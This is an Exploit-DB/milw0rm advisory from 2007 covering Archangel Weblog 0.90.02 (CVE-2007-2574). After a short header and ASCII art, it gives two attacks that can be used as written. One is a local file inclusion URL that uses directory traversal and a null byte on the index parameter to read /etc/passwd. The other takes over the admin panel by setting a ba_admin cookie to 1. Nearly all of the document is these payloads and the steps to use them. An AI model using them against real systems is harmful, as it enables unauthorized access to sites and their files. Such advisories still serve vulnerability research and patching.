Archangel Weblog 0.90.02 - Local File Inclusion / Admin Bypass Vulns

2007-05-05T00:00:00
ID EDB-ID:3859
Type exploitdb
Reporter Dj7xpl
Modified 2007-05-05T00:00:00

Description

Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns. CVE-2007-2574. Webapps exploit for php platform

                                        
                                                                  \\\|///
                    \\  - -  //
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Archangel Weblog version 0.90.02
	      Home     :  http://www.archangelmgt.com/weblog.shtml
              Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
	      Author   :  Dj7xpl / Dj7xpl@2600.ir
	      HomePage :  http://Dj7xpl.2600.ir
	      Type     :  Local File Inclusion & Login Page Bypass By Cookie
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host  : Target
Name  : ba_admin
Value : 1      <------ (Admin User Id)

And Go To Admin Panel :

http://[Target]/[Path]/Admin/

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-05-05]